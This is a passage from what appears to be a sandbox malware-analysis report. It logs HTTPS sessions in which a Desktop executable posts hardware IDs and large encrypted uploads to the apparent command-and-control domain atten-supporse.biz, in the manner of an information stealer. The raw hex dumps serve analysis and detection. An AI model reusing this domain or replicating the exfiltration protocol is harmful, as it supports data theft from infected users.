Server: cloudflare CF-RAY: 8ef868edce238c99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2056&min_rtt=2052&rtt_var=779&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13744&delivery_rate=1396461&cwnd=247&unsent_bytes=0&cid=b989f7509e449231&ts=943&x=0"
2024-12-09 22:25:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 22:25:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49711	104.21.112.1	443	5632	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 22:25:16 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4QAMFM7G36V1CLGD16 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15111 Host: atten-supporse.biz
2024-12-09 22:25:16 UTC	15111	OUT	Data Raw: 2d 2d 34 51 41 4d 46 4d 37 47 33 36 56 31 43 4c 47 44 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 31 42 38 46 41 33 42 43 31 34 43 35 44 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 34 51 41 4d 46 4d 37 47 33 36 56 31 43 4c 47 44 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 51 41 4d 46 4d 37 47 33 36 56 31 43 4c 47 44 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 Data Ascii: --4QAMFM7G36V1CLGD16Content-Disposition: form-data; name="hwid"5A1B8FA3BC14C5DD23D904AF30EFEBBC--4QAMFM7G36V1CLGD16Content-Disposition: form-data; name="pid"2--4QAMFM7G36V1CLGD16Content-Disposition: form-data; name="lid"LOGS11--LiveT
2024-12-09 22:25:16 UTC	1021	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 22:25:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jl9v51hp4qirl61a7mie9gctsa; expires=Fri, 04-Apr-2025 16:11:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obOgdJlHLh04s7OpdxwZ65CDcRVZSZvvc7rsl8eQksaavLQRqvsWwi%2FCMk5t0BxoZ4qEK%2BkZmAFjE43XNCVHCiWd%2BdSG4kFYKl4u7fzXzr0VS7AqKLOVSf%2F7x0qgXBLmm0JgtPs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef868fc1bf68c99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2007&min_rtt=2001&rtt_var=763&sent=12&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16053&delivery_rate=1423001&cwnd=247&unsent_bytes=0&cid=b8363d6e23e5d8a7&ts=975&x=0"
2024-12-09 22:25:16 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 22:25:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49713	104.21.112.1	443	5632	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 22:25:18 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=D4ST53SEUXIHAD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19945 Host: atten-supporse.biz
2024-12-09 22:25:18 UTC	15331	OUT	Data Raw: 2d 2d 44 34 53 54 35 33 53 45 55 58 49 48 41 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 31 42 38 46 41 33 42 43 31 34 43 35 44 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 44 34 53 54 35 33 53 45 55 58 49 48 41 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 34 53 54 35 33 53 45 55 58 49 48 41 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 34 Data Ascii: --D4ST53SEUXIHADContent-Disposition: form-data; name="hwid"5A1B8FA3BC14C5DD23D904AF30EFEBBC--D4ST53SEUXIHADContent-Disposition: form-data; name="pid"3--D4ST53SEUXIHADContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--D4
2024-12-09 22:25:18 UTC	4614	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 Data Ascii: +?2+?2+?o?Mp5p_oI
2024-12-09 22:25:19 UTC	1019	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 22:25:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sa8mmafhn9i5arprioop3doqnk; expires=Fri, 04-Apr-2025 16:11:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ObvBpgSKD3OQf4j3xBRikB3OhSOX9j9e2DGsNf0Q9K6Uf39poGqZncOE2xPf84PX21N%2F8doOX8%2BmJTXwB8JlxK%2Fs972C0RJdnqCQ8vXWKlLPZZztm5T4vcJKE2jKpbK0JmGhPAQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8690b886941e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1556&rtt_var=597&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2846&recv_bytes=20905&delivery_rate=1811414&cwnd=202&unsent_bytes=0&cid=77a0255a563fd78e&ts=851&x=0"
2024-12-09 22:25:19 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 22:25:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49719	104.21.112.1	443	5632	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 22:25:20 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=LBMLM2C9YDSTAUQ7 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1216 Host: atten-supporse.biz
2024-12-09 22:25:20 UTC	1216	OUT	Data Raw: 2d 2d 4c 42 4d 4c 4d 32 43 39 59 44 53 54 41 55 51 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 31 42 38 46 41 33 42 43 31 34 43 35 44 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4c 42 4d 4c 4d 32 43 39 59 44 53 54 41 55 51 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 42 4d 4c 4d 32 43 39 59 44 53 54 41 55 51 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 Data Ascii: --LBMLM2C9YDSTAUQ7Content-Disposition: form-data; name="hwid"5A1B8FA3BC14C5DD23D904AF30EFEBBC--LBMLM2C9YDSTAUQ7Content-Disposition: form-data; name="pid"1--LBMLM2C9YDSTAUQ7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-09 22:25:21 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 22:25:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uv22sr6ns5ovggqoksren36ek4; expires=Fri, 04-Apr-2025 16:12:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqpEWQkuo6fwknHtDWWr14CG3N1%2BWQaNS9d3YwZOZQFvIXl2Ln5CTu51nMkIVfn%2BgIg3mzmo4jiUmcyETNbLJXBwJsd%2FG3SPc%2FZTrFdvr6MQ1OHcFQwwppBgZvTknx1m8dyg6BE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8691acb8e433d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1655&rtt_var=697&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2133&delivery_rate=1764350&cwnd=252&unsent_bytes=0&cid=3caf17f24b1bc048&ts=734&x=0"
2024-12-09 22:25:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 22:25:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49727	104.21.112.1	443	5632	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 22:25:23 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=MEKP6SVXFR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 571362 Host: atten-supporse.biz
2024-12-09 22:25:23 UTC	15331	OUT	Data Raw: 2d 2d 4d 45 4b 50 36 53 56 58 46 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 31 42 38 46 41 33 42 43 31 34 43 35 44 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4d 45 4b 50 36 53 56 58 46 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4d 45 4b 50 36 53 56 58 46 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4d 45 4b 50 36 53 56 58 46 52 0d 0a 43 6f Data Ascii: --MEKP6SVXFRContent-Disposition: form-data; name="hwid"5A1B8FA3BC14C5DD23D904AF30EFEBBC--MEKP6SVXFRContent-Disposition: form-data; name="pid"1--MEKP6SVXFRContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--MEKP6SVXFRCo
2024-12-09 22:25:23 UTC	15331	OUT	Data Raw: b8 ba e4 62 46 e5 67 e9 a2 11 3e a3 87 e1 87 7a b1 b1 e2 0f 8a b8 c5 78 30 8e 6a 9f e2 fd 32 54 a5 1b 24 70 ee 48 11 af 42 44 56 bc fe 0d 13 42 ff fe 68 d8 4f 62 56 88 ce 40 b5 4f ae 8b f5 15 0d 47 32 44 88 6a ba 53 06 00 63 7b a2 02 77 9a 44 c9 98 37 32 8c 89 b0 27 3c 4f b6 56 a5 f7 2d 99 c3 31 83 30 5b 48 70 4b 02 d3 87 86 e3 b9 b7 22 35 3e 5e 1f b7 8d 53 1f 57 7a f9 c5 81 f9 cc c1 9a 65 4f 97 8e db be e5 f7 78 0e 0e 4a 3b 71 e3 45 ad 1f f8 ae 55 68 6e 2c fd 71 97 db 91 00 65 a2 22 59 61 24 58 60 9a 92 af e9 da 40 ea c0 5e 64 64 f7 fb 49 ee 34 4a 9b df b0 e0 1e 1a 8b de ae 0f db 67 69 88 85 67 f1 25 94 e4 15 f6 95 62 48 52 e9 eb ab 96 17 cd d4 0a be 58 f7 f4 7b 72 7f 4c ce d7 fd 5a 7f 2a 3d 1c 11 9a 88 dd 55 5a 12 49 12 fd 8a d0 04 03 e6 c7 0a b3 68 b5 Data Ascii: bFg>zx0j2T$pHBDVBhObV@OG2DjSc{wD72'<OV-10[HpK"5>^SWzeOxJ;qEUhn,qe"Ya$X`@^ddI4Jgig%bHRX{rLZ*=UZIh
2024-12-09 22:25:23 UTC	15331	OUT	Data Raw: e7 a3 8f e1 15 a2 b7 e9 3f 7c 45 a3 5e 94 f2 de ff 88 24 74 75 b0 5f 38 10 3c 7a 3b 0d e7 0f 64 ae 2d bc 19 ae ee fd a0 4a 6a 38 b2 fb 0e bb b3 ac 76 3c b1 da ab a8 6a 7e 3d 64 d8 ab 6c 64 32 9c bb 92 59 55 b5 b0 f9 21 c4 6f f6 68 19 f9 cb df af 21 c6 bb 00 ee 27 27 ad 9f 66 01 ff fd c8 2c 5f e9 d0 57 87 eb 0a b8 8b e7 59 83 99 81 3b 43 5f c4 9c 37 0e 29 c8 49 2d 6d fe b8 bd 46 1f fd 57 4d d8 c4 f9 eb eb 8d 0c d1 b1 e5 fb 0e d5 f3 df c2 59 63 4f 05 6b 3a 7e af 99 fc 49 e1 5b 0d a7 a3 8a 59 a4 3d 37 92 f6 d0 bb fc 55 6e 5f 1f 16 b6 32 e6 94 38 54 dd 7d 37 54 72 f3 9f 21 f6 7a 55 3d 7f 0e 4b 39 6c 34 f2 ab 87 81 45 79 47 e4 83 fd de 41 41 b0 5f e3 e4 b3 1d 46 de 9f f6 61 60 6e d5 3e c6 99 fc 38 8f 7d 0c f2 99 e3 20 d4 eb 57 61 7d dd 3b c1 a9 0f 18 20 f9 55 Data Ascii: ?\|E^$tu_8<z;d-Jj8v<j~=dld2YU!oh!''f,_WY;C_7)I-mFWMYcOk:~I[Y=7Un_28T}7Tr!zU=K9l4EyGAA_Fa`n>8} Wa}; U
2024-12-09 22:25:23 UTC	15331	OUT	Data Raw: 4f 2c 76 3b c0 87 ff d2 e6 9f f4 55 af 6f 7c c9 8d 63 0a 58 17 22 59 15 73 af 1c 93 c5 c4 fb 22 36 49 ba 69 29 d5 95 32 9e 0d bd 01 45 cd d0 bf cc 89 3f 5b 60 a9 cf f2 29 8c 36 e3 67 13 0e 03 cc ba 3f a3 e9 9e 5b a7 0f 37 f2 ce 7f 45 45 5a 3f df 21 f9 62 06 00 cf 4e c5 19 cc 57 4e d6 3d ff cd 65 fd 37 91 d3 a7 7d 4b 29 59 1b dd b4 cb 7a e3 3d 2d a3 2f 24 7d cf 85 c1 9f 57 e3 d9 30 c4 2d 19 c5 79 ac ba 1d d3 81 77 71 c1 93 af 2e 98 19 ac c8 da 8e da 51 1d 1c 2d 71 36 2a 20 99 bb ec 69 ba 76 ef 0b f5 27 6b 20 cf 94 3e f7 a8 78 e7 ee fe af 43 f6 db 01 fa 3b 85 25 60 38 f1 33 92 44 53 a0 19 f1 03 5d 7e 28 9a 17 4c 94 67 6b a0 bb 79 98 b3 08 a0 84 a4 e0 af 49 1d 4f e6 af ca 94 00 9a 70 04 04 7a 84 ce 15 f3 40 39 fc ed 68 84 10 10 10 86 fd 6f 67 71 91 5a 81 1d Data Ascii: O,v;Uo\|cX"Ys"6Ii)2E?[`)6g?[7EEZ?!bNWN=e7}K)Yz=-/$}W0-ywq.Q-q6* iv'k >xC;%`83DS]~(LgkyIOpz@9hogqZ
2024-12-09 22:25:23 UTC	15331	OUT	Data Raw: 3b c3 6b 37 cd 76 4b 0c ff ba 94 a4 8e e9 d3 10 07 2e 4f a5 4e 5f 05 53 ac 1d 9e fa 07 da ba 89 2d e6 57 a8 ea 17 6a 0c aa 8d 5a 19 2b 11 ad ff db ba 8e e0 ba 6b 99 71 2a 3c 42 a5 ea 74 26 06 64 95 23 de fc 3f a1 fa ff e4 6c 03 38 cd cc 96 22 02 e6 30 e0 1a 7a 6a c4 5e 12 6a 7a b9 dd f5 8b 13 b0 80 03 72 0c 09 d9 0d 3b 96 08 10 ba 9d af 0a 05 29 c1 e9 c2 2b 06 80 8c 08 13 05 07 ba ee 00 d3 ee fa 60 0c 5b 0d d5 72 ca df a8 70 a8 65 0e ff cf 24 aa 17 7d 74 a8 55 bc 00 19 f3 4a 82 fc c1 0c c2 c9 67 d4 85 18 7d 97 0b 7a 3d 9b ef 2e 8a 23 ca 90 d3 b4 d8 56 5c af a3 70 f2 a0 61 4a 75 ac d2 0d d1 29 94 80 05 91 8a d8 3c bc d4 4e 47 10 d9 17 7d ac 37 67 3f 6e 86 eb 72 77 d6 2a a8 b0 29 20 56 72 12 37 f7 fa 21 9b ad 11 47 87 6f f1 17 05 8d a3 0b df 79 25 14 3a c4 Data Ascii: ;k7vK.ON_S-WjZ+kq<Bt&d#?l8"0zj^jzr;)+`[rpe$}tUJg}z=.#V\paJu)<NG}7g?nrw) Vr7!Goy%:
2024-12-09 22:25:23 UTC	15331	OUT	Data Raw: d9 48 85 18 6c ee 32 77 0d 0e 3e a1 65 09 69 5a 92 20 28 7f 2e f7 bf 75 76 fd 76 cd bc c2 65 70 c7 ef 19 9f ef c8 38 cc 1f e9 7f 67 26 0a 00 c0 11 06 1a 89 50 28 60 ae 4f 4d 3d 18 49 3b 0f e7 87 d7 61 4f 28 37 3a 6f f7 40 5c f5 fe c3 06 60 0d 9b a7 c0 ab 3f 46 6e 0e 51 04 c0 ab a5 36 24 5d 81 45 4f 09 fd 55 7a c0 00 3b 15 a0 81 84 78 11 87 10 26 54 fa 3d 26 f7 34 21 26 b2 da f7 4b ab c0 0b 7d 6f c9 9b 2d 23 7f df b0 63 55 75 1c 72 14 16 ae 7f ae 77 ab f4 fa 1b 88 3c be 71 79 8f 0c d0 be 39 34 f1 0f 66 e3 2b c4 28 ab 3e 86 63 08 8e e9 60 84 a0 85 46 a1 5e c9 9f b2 f4 c6 3d 97 ce e4 62 7d 0b 0b 6a 08 fc 73 70 7c 62 99 8e 68 78 7d 1b 6c 97 8d ca 43 64 f5 c5 83 d8 ce bf 92 93 bf 82 ec 40 f0 c6 94 54 34 f0 8a 71 16 90 f3 f0 57 52 05 e8 ed a1 9f f5 c1 bb 46 e3 Data Ascii: Hl2w>eiZ (.uvvep8g&P(`OM=I;aO(7:o@\`?FnQ6$]EOUz;x&T=&4!&K}o-#cUurw<qy94f+(>c`F^=b}jsp\|bhx}lCd@T4qWRF
2024-12-09 22:25:23 UTC	15331	OUT	Data Raw: 81 41 7c 6a dd 71 9f b5 7d 2d 66 2a 92 9b 80 5a 91 fb 52 b6 9b 0d 07 41 9d 5a 4c a9 7e 01 ef 49 ae df 9e 62 6c 48 eb fc 17 ba 20 23 a9 98 8b 45 29 da f1 20 0e 4a d6 d7 3e 84 c8 ec 02 b6 4b ea 96 07 c4 30 30 fe 6c b8 bd 29 a1 d2 ea b9 38 fc 59 20 8d f5 db 95 f5 fb 9f ba 9a 67 11 dc cd 9c ed 49 8e d2 1b d7 1a 45 8e 59 30 4b 61 e1 c8 c6 1e 6b b6 79 fc 62 38 ab 2d 71 47 3d 86 a2 3e c4 a0 32 08 e3 8d 7f bf 7d f1 eb 85 0d dd ee 15 ac fb cc 6b dc 65 64 ff 29 75 a3 d5 19 fa 32 eb 9f dd 52 03 54 55 86 0e 76 aa 87 07 d4 2c 7f ff e9 79 f3 52 88 a5 15 a1 28 6e b3 02 13 35 ff 46 f5 f4 fd 13 77 e6 9d fa 3c fd 72 7b 9e b6 08 04 d0 7d 6f 2a 05 e2 b5 c5 65 d7 94 f6 a2 f0 d1 ab 85 8f 2a 50 d9 57 82 18 a3 c7 d4 c2 7a bf 0b 7a ab fd 31 c9 a3 76 da bd ee a0 88 9f 16 f2 1c e1 Data Ascii: A\|jq}-fZRAZL~IblH #E) J>K00l)8Y gIEY0Kakyb8-qG=>2}ked)u2RTUv,yR(n5Fw<r{}oe*PWzz1v
2024-12-09 22:25:23 UTC	15331	OUT	Data Raw: d3 f8 5c 9d b6 32 77 68 72 4e 87 b9 7b f8 db ea 51 7e ce 90 c9 cc b1 fa 9b ec 6a 52 b0 e0 bb ed 20 5d 42 1d 3a d6 04 c0 51 1d 30 dd b9 b3 22 0e 22 39 c7 bc f6 60 f5 bc 99 04 68 19 51 a1 d5 dc bf 4f 7b 20 6a 1a fe 9d bb 4f 25 b5 40 c2 75 eb 8b 47 ae 35 c8 78 99 de df 22 d1 22 56 df cc 14 17 a7 88 ac 1c cf 2e ec ab 6c 78 5e 58 fc d3 1a c1 94 46 65 7c 6e 60 fd 27 04 0f 47 c3 27 44 81 1d fb 03 24 78 52 51 a5 07 90 a0 53 0a 34 9b f6 da 6d 4e 92 8c 84 a8 e4 16 0b c0 7c 75 7f 30 e8 6b 5d 25 4c 91 4e 08 40 c0 89 9c 17 4f 6a 7c b8 57 31 7c 1f 69 a7 31 64 d0 ed 8d b3 20 5d 13 77 19 03 09 03 19 9e 06 d0 d2 5f 7f 88 65 b8 39 1e 80 87 f5 87 98 5e 12 8f 2b cb 24 81 10 d3 51 9a ce 44 37 e9 23 98 0c de 1a e6 ec 25 f6 e5 bd 8c fd bc 73 e4 cd 93 eb 79 e0 58 0f 7d 82 e7 9d Data Ascii: \2whrN{Q~jR ]B:Q0""9`hQO{ jO%@uG5x""V.lx^XFe\|n`'G'D$xRQS4mN\|u0k]%LN@Oj\|W1\|i1d ]w_e9^+$QD7#%syX}
2024-12-09 22:25:23 UTC	15331	OUT	Data Raw: 68 ea 08 c8 53 88 0b ed 72 d9 78 3f f7 32 c8 68 57 aa 0d 3a ec 65 93 ee 18 77 30 23 d5 3e 33 72 bf 6c b3 ad de 93 ea a7 98 7e 25 15 38 00 3a f8 d7 3f ba 51 c4 6c d5 61 e6 59 c4 df 57 30 c9 f3 8c 74 76 2e 0b ef ed 03 fd 5a 2d 4c 42 d6 a1 b1 d9 b9 c0 c1 39 aa 0b d1 fc 80 3e 29 54 2f e1 d0 86 a0 28 2f 98 e6 10 53 12 15 5e 7f 21 cc 8d 8a 52 8c f9 d2 ab 6f ff 92 bf 46 69 b8 0d 61 85 85 62 4e 38 0c 55 bd 7c 82 6f e1 d5 29 53 dc 8a 8c e4 3b ce 87 f5 ca 50 55 99 59 07 c3 8c f8 ad 2d e0 19 63 47 cf db 89 f1 e1 f0 ea 93 3f 74 a3 48 1d 2c 54 2c e3 c5 12 17 0b 8a 65 4a 85 d7 cf 5a 50 55 d1 d7 10 94 e6 15 81 67 92 5c d5 20 a1 b8 75 6f 57 26 e8 05 01 02 dc 77 da 82 72 3f b6 9d d5 b4 8b 44 7a 04 eb e3 9a 57 b5 99 aa 6a 2a 39 59 57 c7 7e ca ba b7 2c a9 cb b7 87 05 f5 67 Data Ascii: hSrx?2hW:ew0#>3rl~%8:?QlaYW0tv.Z-LB9>)T/(/S^!RoFiabN8U\|o)S;PUY-cG?tH,T,eJZPUg\ uoW&wr?DzWj*9YW~,g
2024-12-09 22:25:23 UTC	15331	OUT	Data Raw: 16 a0 d4 0a 92 36 61 48 98 a3 05 ea 43 67 86 ab 9b 21 2a 0e 91 8c e1 b9 be 9b 9f 6a f9 ba 30 ef 3b c8 1f ea 5d 1c f0 f3 0c 9f eb 5d ad da 7b 5a 2b 68 f6 33 d9 6f 16 43 1f 32 e7 c4 64 9d 6a a4 d3 fd 5e f9 b3 b9 77 fd d9 3c 83 b1 59 5d 0a 4b 9d f8 9f da c0 5e e2 17 f4 38 db 07 e2 d3 c4 28 e3 10 ab db 86 3c 65 3e ff a1 b0 f4 77 b0 fb b8 f8 c7 89 f5 37 28 e0 36 3c 38 c0 be 0e e4 49 d9 d5 91 33 8d b3 1b 8e f4 a1 fe 70 56 3b 0b 81 02 e1 fe cb 0b d7 36 22 dc 6f 03 bd 52 20 28 08 dc 87 3d 27 11 f0 c0 4e 17 78 e0 0f 98 3f 2c 70 0b 8f ab ae d6 3a 16 ce 49 80 c8 72 19 b0 42 e0 f7 ed 9c 15 04 fd a8 d5 98 a5 94 f9 b9 07 9e 8f fd ec cd 96 ef 39 57 de 28 2e 6f b2 62 46 3a 27 7e b8 08 0c cf 10 68 4f 00 eb 7e 34 ec bc 0b 64 ec 71 f8 df 71 b1 ce 6d 60 5a 16 21 08 9c 9c 1e Data Ascii: 6aHCg!*j0;]]{Z+h3oC2dj^w<Y]K^8(<e>w7(6<8I3pV;6"oR (='Nx?,p:IrB9W(.obF:'~hO~4dqqm`Z!
2024-12-09 22:25:27 UTC	1024	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 22:25:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=38i995h7d17qatijcdoj83l522; expires=Fri, 04-Apr-2025 16:12:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F6Wwuo9sNnhwO7%2BX5y796wASgt2djVJ03UEHRRXLeyKzoHQ7p58XFIhunuKZXTrmORF7HlwHdCwBX20KQe0pk1zytU%2F2BIvbX9ipeCgSJGFt%2F9%2F4Q2gI3YnbtFkYbTKpeyjxvJE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8692a5b1dde98-EWR alt-svc: 